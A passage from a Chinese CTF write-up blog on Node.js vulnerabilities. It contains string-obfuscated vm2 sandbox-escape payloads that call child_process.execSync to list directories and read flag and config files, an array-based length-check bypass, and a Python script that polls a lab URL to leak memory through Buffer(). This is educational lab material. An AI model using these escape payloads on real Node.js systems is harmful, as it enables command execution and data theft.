        <span class="k">return</span> <span class="nx">e</span><span class="p">[</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`get_pro`</span><span class="si">}</span><span class="sb">cess`</span><span class="si">}</span><span class="sb">`</span><span class="p">](()=&gt;{}).</span><span class="nx">mainModule</span><span class="p">[</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`requir`</span><span class="si">}</span><span class="sb">e`</span><span class="si">}</span><span class="sb">`</span><span class="p">](</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`child_proces`</span><span class="si">}</span><span class="sb">s`</span><span class="si">}</span><span class="sb">`</span><span class="p">)[</span><span class="sb">`</span><span class="si">${</span><span class="sb">`</span><span class="si">${</span><span class="sb">`exe`</span><span class="si">}</span><span class="sb">cSync`</span><span class="si">}</span><span class="sb">`</span><span class="p">](</span><span class="sb">`ls /`</span><span class="p">).</span><span class="nx">toString</span><span class="p">();</span>
    <span class="p">}</span>
<span class="p">})()</span>

<span class="c1">// payload3 -- 使用join拼接字符串
</span><span class="c1"></span><span class="p">(()=&gt;{</span> <span class="nx">TypeError</span><span class="p">[[</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`y`</span><span class="p">,</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)][</span><span class="sb">`a`</span><span class="p">]</span> <span class="o">=</span> <span class="nx">f</span><span class="p">=&gt;</span><span class="nx">f</span><span class="p">[[</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`n`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`u`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)]([</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`u`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`n`</span><span class="p">,</span><span class="sb">` `</span><span class="p">,</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">))();</span> <span class="k">try</span><span class="p">{</span> <span class="nb">Object</span><span class="p">[</span><span class="sb">`preventExtensions`</span><span class="p">](</span><span class="nx">Buffer</span><span class="p">[</span><span class="sb">`from`</span><span class="p">](</span><span class="sb">``</span><span class="p">))[</span><span class="sb">`a`</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="p">}</span><span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span> <span class="k">return</span> <span class="nx">e</span><span class="p">[</span><span class="sb">`a`</span><span class="p">](()=&gt;{})[</span><span class="sb">`mainModule`</span><span class="p">][[</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`q`</span><span class="p">,</span><span class="sb">`u`</span><span class="p">,</span><span class="sb">`i`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)]([</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`h`</span><span class="p">,</span><span class="sb">`i`</span><span class="p">,</span><span class="sb">`l`</span><span class="p">,</span><span class="sb">`d`</span><span class="p">,</span><span class="sb">`_`</span><span class="p">,</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">))[[</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`x`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`S`</span><span class="p">,</span><span class="sb">`y`</span><span class="p">,</span><span class="sb">`n`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)](</span><span class="sb">`cat /flag`</span><span class="p">)[</span><span class="sb">`toString`</span><span class="p">]();</span> <span class="p">}</span> <span class="p">})()</span>
</code></pre></td></tr></table></div>
</div>
</div><h1 id="hitcon-2016leaking"><a href="#hitcon-2016leaking" class="anchor-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon anchor-icon"><path d="M326.612 185.391c59.747 59.809 58.927 155.698.36 214.59-.11.12-.24.25-.36.37l-67.2 67.2c-59.27 59.27-155.699 59.262-214.96 0-59.27-59.26-59.27-155.7 0-214.96l37.106-37.106c9.84-9.84 26.786-3.3 27.294 10.606.648 17.722 3.826 35.527 9.69 52.721 1.986 5.822.567 12.262-3.783 16.612l-13.087 13.087c-28.026 28.026-28.905 73.66-1.155 101.96 28.024 28.579 74.086 28.749 102.325.51l67.2-67.19c28.191-28.191 28.073-73.757 0-101.83-3.701-3.694-7.429-6.564-10.341-8.569a16.037 16.037 0 0 1-6.947-12.606c-.396-10.567 3.348-21.456 11.698-29.806l21.054-21.055c5.521-5.521 14.182-6.199 20.584-1.731a152.482 152.482 0 0 1 20.522 17.197zM467.547 44.449c-59.261-59.262-155.69-59.27-214.96 0l-67.2 67.2c-.12.12-.25.25-.36.37-58.566 58.892-59.387 154.781.36 214.59a152.454 152.454 0 0 0 20.521 17.196c6.402 4.468 15.064 3.789 20.584-1.731l21.054-21.055c8.35-8.35 12.094-19.239 11.698-29.806a16.037 16.037 0 0 0-6.947-12.606c-2.912-2.005-6.64-4.875-10.341-8.569-28.073-28.073-28.191-73.639 0-101.83l67.2-67.19c28.239-28.239 74.3-28.069 102.325.51 27.75 28.3 26.872 73.934-1.155 101.96l-13.087 13.087c-4.35 4.35-5.769 10.79-3.783 16.612 5.864 17.194 9.042 34.999 9.69 52.721.509 13.906 17.454 20.446 27.294 10.606l37.106-37.106c59.271-59.259 59.271-155.699.001-214.959z"/></svg></a><a href="#contents:hitcon-2016leaking" class="headings">[HITCON 2016]Leaking</a></h1>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-javascript" data-lang="javascript"><span class="s2">&#34;use strict&#34;</span><span class="p">;</span>

<span class="kd">var</span> <span class="nx">randomstring</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">&#34;randomstring&#34;</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">&#34;express&#34;</span><span class="p">);</span>
<span class="kd">var</span> <span class="p">{</span>
    <span class="nx">VM</span>
<span class="p">}</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">&#34;vm2&#34;</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">&#34;fs&#34;</span><span class="p">);</span>

<span class="kd">var</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">flag</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">&#34;./config.js&#34;</span><span class="p">).</span><span class="nx">flag</span>

<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s2">&#34;/&#34;</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s2">&#34;Content-Type&#34;</span><span class="p">,</span> <span class="s2">&#34;text/plain&#34;</span><span class="p">);</span>

    <span class="cm">/*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */</span>
    <span class="nb">eval</span><span class="p">(</span><span class="s2">&#34;var flag_&#34;</span> <span class="o">+</span> <span class="nx">randomstring</span><span class="p">.</span><span class="nx">generate</span><span class="p">(</span><span class="mi">64</span><span class="p">)</span> <span class="o">+</span> <span class="s2">&#34; = \&#34;hitcon{&#34;</span> <span class="o">+</span> <span class="nx">flag</span> <span class="o">+</span> <span class="s2">&#34;}\&#34;;&#34;</span><span class="p">)</span>
    <span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">data</span> <span class="o">&amp;&amp;</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">length</span> <span class="o">&lt;=</span> <span class="mi">12</span><span class="p">)</span> <span class="p">{</span>
        <span class="kd">var</span> <span class="nx">vm</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">VM</span><span class="p">({</span>
            <span class="nx">timeout</span><span class="o">:</span> <span class="mi">1000</span>
        <span class="p">});</span>
        <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">data</span><span class="p">);</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s2">&#34;eval -&gt;&#34;</span> <span class="o">+</span> <span class="nx">vm</span><span class="p">.</span><span class="nx">run</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">data</span><span class="p">));</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">fs</span><span class="p">.</span><span class="nx">readFileSync</span><span class="p">(</span><span class="mi">__</span><span class="nx">filename</span><span class="p">).</span><span class="nx">toString</span><span class="p">());</span>
    <span class="p">}</span>
<span class="p">});</span>

<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="mi">3000</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
    <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">&#34;listening on port 3000!&#34;</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></td></tr></table></div>
</div>
</div><p>主页面GET传参data，通过<strong>数组绕过</strong>长度判断。</p>
<h2 id="方法一---vm2逃逸"><a href="#方法一---vm2逃逸" class="anchor-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon anchor-icon"><path d="M326.612 185.391c59.747 59.809 58.927 155.698.36 214.59-.11.12-.24.25-.36.37l-67.2 67.2c-59.27 59.27-155.699 59.262-214.96 0-59.27-59.26-59.27-155.7 0-214.96l37.106-37.106c9.84-9.84 26.786-3.3 27.294 10.606.648 17.722 3.826 35.527 9.69 52.721 1.986 5.822.567 12.262-3.783 16.612l-13.087 13.087c-28.026 28.026-28.905 73.66-1.155 101.96 28.024 28.579 74.086 28.749 102.325.51l67.2-67.19c28.191-28.191 28.073-73.757 0-101.83-3.701-3.694-7.429-6.564-10.341-8.569a16.037 16.037 0 0 1-6.947-12.606c-.396-10.567 3.348-21.456 11.698-29.806l21.054-21.055c5.521-5.521 14.182-6.199 20.584-1.731a152.482 152.482 0 0 1 20.522 17.197zM467.547 44.449c-59.261-59.262-155.69-59.27-214.96 0l-67.2 67.2c-.12.12-.25.25-.36.37-58.566 58.892-59.387 154.781.36 214.59a152.454 152.454 0 0 0 20.521 17.196c6.402 4.468 15.064 3.789 20.584-1.731l21.054-21.055c8.35-8.35 12.094-19.239 11.698-29.806a16.037 16.037 0 0 0-6.947-12.606c-2.912-2.005-6.64-4.875-10.341-8.569-28.073-28.073-28.191-73.639 0-101.83l67.2-67.19c28.239-28.239 74.3-28.069 102.325.51 27.75 28.3 26.872 73.934-1.155 101.96l-13.087 13.087c-4.35 4.35-5.769 10.79-3.783 16.612 5.864 17.194 9.042 34.999 9.69 52.721.509 13.906 17.454 20.446 27.294 10.606l37.106-37.106c59.271-59.259 59.271-155.699.001-214.959z"/></svg></a><a href="#contents:方法一---vm2逃逸" class="headings">方法一 - vm2逃逸</a></h2>
<p>用<code>[HFCTF2020]JustEscape</code>的payload就行，</p>
<p>payload</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-javascript" data-lang="javascript"><span class="o">?</span><span class="nx">data</span><span class="p">[]</span><span class="o">=</span><span class="p">(()=&gt;{</span> <span class="nx">TypeError</span><span class="p">[[</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`y`</span><span class="p">,</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)][</span><span class="sb">`a`</span><span class="p">]</span> <span class="o">=</span> <span class="nx">f</span><span class="p">=&gt;</span><span class="nx">f</span><span class="p">[[</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`n`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`u`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)]([</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`t`</span><span class="p">,</span><span class="sb">`u`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`n`</span><span class="p">,</span><span class="sb">` `</span><span class="p">,</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">))();</span> <span class="k">try</span><span class="p">{</span> <span class="nb">Object</span><span class="p">[</span><span class="sb">`preventExtensions`</span><span class="p">](</span><span class="nx">Buffer</span><span class="p">[</span><span class="sb">`from`</span><span class="p">](</span><span class="sb">``</span><span class="p">))[</span><span class="sb">`a`</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="p">}</span><span class="k">catch</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span> <span class="k">return</span> <span class="nx">e</span><span class="p">[</span><span class="sb">`a`</span><span class="p">](()=&gt;{})[</span><span class="sb">`mainModule`</span><span class="p">][[</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`q`</span><span class="p">,</span><span class="sb">`u`</span><span class="p">,</span><span class="sb">`i`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)]([</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`h`</span><span class="p">,</span><span class="sb">`i`</span><span class="p">,</span><span class="sb">`l`</span><span class="p">,</span><span class="sb">`d`</span><span class="p">,</span><span class="sb">`_`</span><span class="p">,</span><span class="sb">`p`</span><span class="p">,</span><span class="sb">`r`</span><span class="p">,</span><span class="sb">`o`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">,</span><span class="sb">`s`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">))[[</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`x`</span><span class="p">,</span><span class="sb">`e`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">,</span><span class="sb">`S`</span><span class="p">,</span><span class="sb">`y`</span><span class="p">,</span><span class="sb">`n`</span><span class="p">,</span><span class="sb">`c`</span><span class="p">][</span><span class="sb">`join`</span><span class="p">](</span><span class="sb">``</span><span class="p">)](</span><span class="sb">`cat /app/config.js`</span><span class="p">)[</span><span class="sb">`toString`</span><span class="p">]();</span> <span class="p">}</span> <span class="p">})()</span>
</code></pre></td></tr></table></div>
</div>
</div><h2 id="方法二---buffer读取"><a href="#方法二---buffer读取" class="anchor-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon anchor-icon"><path d="M326.612 185.391c59.747 59.809 58.927 155.698.36 214.59-.11.12-.24.25-.36.37l-67.2 67.2c-59.27 59.27-155.699 59.262-214.96 0-59.27-59.26-59.27-155.7 0-214.96l37.106-37.106c9.84-9.84 26.786-3.3 27.294 10.606.648 17.722 3.826 35.527 9.69 52.721 1.986 5.822.567 12.262-3.783 16.612l-13.087 13.087c-28.026 28.026-28.905 73.66-1.155 101.96 28.024 28.579 74.086 28.749 102.325.51l67.2-67.19c28.191-28.191 28.073-73.757 0-101.83-3.701-3.694-7.429-6.564-10.341-8.569a16.037 16.037 0 0 1-6.947-12.606c-.396-10.567 3.348-21.456 11.698-29.806l21.054-21.055c5.521-5.521 14.182-6.199 20.584-1.731a152.482 152.482 0 0 1 20.522 17.197zM467.547 44.449c-59.261-59.262-155.69-59.27-214.96 0l-67.2 67.2c-.12.12-.25.25-.36.37-58.566 58.892-59.387 154.781.36 214.59a152.454 152.454 0 0 0 20.521 17.196c6.402 4.468 15.064 3.789 20.584-1.731l21.054-21.055c8.35-8.35 12.094-19.239 11.698-29.806a16.037 16.037 0 0 0-6.947-12.606c-2.912-2.005-6.64-4.875-10.341-8.569-28.073-28.073-28.191-73.639 0-101.83l67.2-67.19c28.239-28.239 74.3-28.069 102.325.51 27.75 28.3 26.872 73.934-1.155 101.96l-13.087 13.087c-4.35 4.35-5.769 10.79-3.783 16.612 5.864 17.194 9.042 34.999 9.69 52.721.509 13.906 17.454 20.446 27.294 10.606l37.106-37.106c59.271-59.259 59.271-155.699.001-214.959z"/></svg></a><a href="#contents:方法二---buffer读取" class="headings">方法二 - Buffer读取</a></h2>
<p>来自<a href="https://blog.csdn.net/SopRomeo/article/details/108963957" target="_blank" rel="noopener">[HITCON 2016]Leaking 记录</a></p>
<p>低版本的node可以使用buffer()来查看内存，只要调用过的变量，都会存在内存中，那么我们可以构造paylaod读取内存。</p>
<div class="highlight"><div class="chroma">
<div class="table-container"><table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="n">url</span> <span class="o">=</span> <span class="s1">&#39;http://19a931b5-2f8a-42c4-b400-20ba417d6a4f.node3.buuoj.cn/?data=Buffer(500)&#39;</span>

<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
        <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>

        <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">0.1</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s1">&#39;trying&#39;</span><span class="p">)</span>
        <span class="k">if</span> <span class="s1">&#39;flag{&#39;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">)</span>
            <span class="k">break</span>
</code></pre></td></tr></table></div>
</div>
</div>
            </div>

            
    
    
        <ul class="post-copyright">
            <li class="copyright-item author"><span class="copyright-item-text">作者</span>：<a href="https://tyskill.github.io" class="p-author h-card" target="_blank" rel="noopener">tyskill</a></li>
            
                
                
                
                
                <li class="copyright-item link"><span class="copyright-item-text">链接</span>：<a href="/posts/nodejs%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/" target="_blank" rel="noopener">https://tyskill.github.io/posts/nodejs漏洞学习/</a></li>
            
            <li class="copyright-item license"><span class="copyright-item-text">许可</span>：<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a></li>
            
        </ul>
    



        </article>

        

        


        


        


        
    
    
        <div class="related-posts">
            <h2 class="related-title">相关文章：<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon related-icon"><path d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm144 276c0 6.6-5.4 12-12 12h-92v92c0 6.6-5.4 12-12 12h-56c-6.6 0-12-5.4-12-12v-92h-92c-6.6 0-12-5.4-12-12v-56c0-6.6 5.4-12 12-12h92v-92c0-6.6 5.4-12 12-12h56c6.6 0 12 5.4 12 12v92h92c6.6 0 12 5.4 12 12v56z"/></svg></h2>
            <ul class="related-list">
                
                    <li class="related-item">
                        <a href="/posts/nctf2020/" class="related-link">NCTF2020记录+复现</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/posts/flask%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/" class="related-link">BUU刷题记录-flask漏洞学习</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/posts/buuoj_21_1/" class="related-link">[BUUOJ]2021第一弹</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/posts/i-soon2020/" class="related-link">安洵杯2020</a>
                    </li>
                
                    <li class="related-item">
                        <a href="/posts/ycb2020/" class="related-link">羊城杯2020复现</a>
                    </li>
                
            </ul>
        </div>
    



        
    
        <div class="post-tags">
            
                
                
                
                
                    
                    <a href="/tags/buuoj/" rel="tag" class="post-tags-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon tag-icon"><path d="M0 252.118V48C0 21.49 21.49 0 48 0h204.118a48 48 0 0 1 33.941 14.059l211.882 211.882c18.745 18.745 18.745 49.137 0 67.882L293.823 497.941c-18.745 18.745-49.137 18.745-67.882 0L14.059 286.059A48 48 0 0 1 0 252.118zM112 64c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48z"/></svg>buuoj</a>
                
            
                
                
                
                
                    
                    <a href="/tags/nodejs/" rel="tag" class="post-tags-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon tag-icon"><path d="M0 252.118V48C0 21.49 21.49 0 48 0h204.118a48 48 0 0 1 33.941 14.059l211.882 211.882c18.745 18.745 18.745 49.137 0 67.882L293.823 497.941c-18.745 18.745-49.137 18.745-67.882 0L14.059 286.059A48 48 0 0 1 0 252.118zM112 64c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48z"/></svg>Nodejs</a>
                
            
                
                
                
                
                    
                    <a href="/tags/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/" rel="tag" class="post-tags-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon tag-icon"><path d="M0 252.118V48C0 21.49 21.49 0 48 0h204.118a48 48 0 0 1 33.941 14.059l211.882 211.882c18.745 18.745 18.745 49.137 0 67.882L293.823 497.941c-18.745 18.745-49.137 18.745-67.882 0L14.059 286.059A48 48 0 0 1 0 252.118zM112 64c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48z"/></svg>沙箱逃逸</a>
                
            
                
                
                
                
                    
                    <a href="/tags/javascript/" rel="tag" class="post-tags-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon tag-icon"><path d="M0 252.118V48C0 21.49 21.49 0 48 0h204.118a48 48 0 0 1 33.941 14.059l211.882 211.882c18.745 18.745 18.745 49.137 0 67.882L293.823 497.941c-18.745 18.745-49.137 18.745-67.882 0L14.059 286.059A48 48 0 0 1 0 252.118zM112 64c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48z"/></svg>javascript</a>
                
            
                
                
                
                
                    
                    <a href="/tags/%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="tag" class="post-tags-link"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon tag-icon"><path d="M0 252.118V48C0 21.49 21.49 0 48 0h204.118a48 48 0 0 1 33.941 14.059l211.882 211.882c18.745 18.745 18.745 49.137 0 67.882L293.823 497.941c-18.745 18.745-49.137 18.745-67.882 0L14.059 286.059A48 48 0 0 1 0 252.118zM112 64c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48z"/></svg>原型链污染</a>
                
            
        </div>
    



        


        


        
    
        
        
    
    
    
    
        <ul class="post-nav">
            
                <li class="post-nav-prev">
                    <a href="/posts/n1ctf2020/" rel="prev">&lt; N1CTF2020赛后复现</a>
                </li>
            
            
                <li class="post-nav-next">
                    <a href="/posts/xhlj2020web%E5%A4%8D%E7%8E%B0/" rel="next">西湖论剑2020Web复现 &gt;</a>
                </li>
            
        </ul>
    



        


    </div>
</main>


            
    <div id="back-to-top" class="back-to-top">
        <a href="#"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon arrow-up"><path d="M34.9 289.5l-22.2-22.2c-9.4-9.4-9.4-24.6 0-33.9L207 39c9.4-9.4 24.6-9.4 33.9 0l194.3 194.3c9.4 9.4 9.4 24.6 0 33.9L413 289.4c-9.5 9.5-25 9.3-34.3-.4L264 168.6V456c0 13.3-10.7 24-24 24h-32c-13.3 0-24-10.7-24-24V168.6L69.2 289.1c-9.3 9.8-24.8 10-34.3.4z"/></svg></a>
    </div>


            
    <footer id="footer" class="footer">
        <div class="footer-inner">
            <div class="site-info">©&nbsp;2020–2021&nbsp;<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="icon footer-icon"><path d="M462.3 62.6C407.5 15.9 326 24.3 275.7 76.2L256 96.5l-19.7-20.3C186.1 24.3 104.5 15.9 49.7 62.6c-62.8 53.6-66.1 149.8-9.9 207.9l193.5 199.8c12.5 12.9 32.8 12.9 45.3 0l193.5-199.8c56.3-58.1 53-154.3-9.8-207.9z"/></svg>&nbsp;tyskill</div><div class="powered-by">Powered by <a href="https://github.com/gohugoio/hugo" target="_blank" rel="noopener">Hugo</a> | Theme is <a href="https://github.com/reuixiy/hugo-theme-meme" target="_blank" rel="noopener">MemE</a></div><div class="custom-footer">地不长无名之草，天不生无用之人</div>
                <div class="busuanzi-site-uv-and-pv">
